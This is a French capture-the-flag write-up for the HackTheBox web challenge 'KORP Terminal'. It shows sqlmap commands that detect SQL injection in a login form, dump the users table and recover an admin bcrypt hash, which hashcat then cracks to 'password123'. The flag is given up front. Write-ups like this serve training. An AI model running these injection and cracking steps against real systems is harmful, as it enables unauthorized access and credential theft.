KORP Terminal

Catégorie: Web Difficulté: very-easy Flag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}

Challenge

Description


Your faction must infiltrate the KORPℱ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.

Analyse du site

Le site se compose uniquement d’un formulaire qui est envoyĂ© en POST avec les paramĂštres username et password. On peut lancer un sqlmap dessus pour voir si une injection est dĂ©tectĂ©e

$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username,password" --method POST --ignore-code 401 --batch

[...]
[22:26:14] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[22:26:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[22:26:15] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[22:26:16] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[22:26:18] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[22:26:19] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'username' is vulnerable.

Exploitation de l’injection SQL

Le paramÚtre username est vulnérable, on va pouvoir tenter de dump la base de données

$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 --dbs --batch

available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test

On y trouve la database korp_terminal

$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal --tables --batch

Database: korp_terminal
[1 table]
+-------+
| users |
+-------+

Celle-ci est composĂ© d’une seule table : users

sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal -T users --dump --batch

Database: korp_terminal
Table: users
[1 entry]
+----+--------------------------------------------------------------+----------+
| id | password                                                     | username |
+----+--------------------------------------------------------------+----------+
| 1  | $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. | admin    |
+----+--------------------------------------------------------------+----------+

On y trouve 1 compte : admin

Le mot de passe est visiblement hashĂ©, mĂȘme si l’on reconnaĂźt le bcrypt on va passer par hashcat pour l’identifier Ă  coup sĂ»r puis on en profitera pour essayer de le casser


Cassage du hash

Préalablement on enregistre le mot de passe dans un fichier, ici nommé hashes.txt

J’utilise la wordlist rockyou.txt pour tenter de le casser

$ hashcat hashes.txt

The following 4 hash-modes match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce

On ne s’était pas trompĂ©, c’est bien du bcrypt, passons au bruteforce

$ hashcat hashes.txt -m 3200 rockyout.txt

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Dictionary cache built:
* Filename..: ../rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))

Et voilĂ , notre mot de passe : password123


Récupération du flag

Maintenant il est possible de se connecter avec admin:password123

DerniĂšre mise Ă  jour

Cet article vous a-t-il été utile ?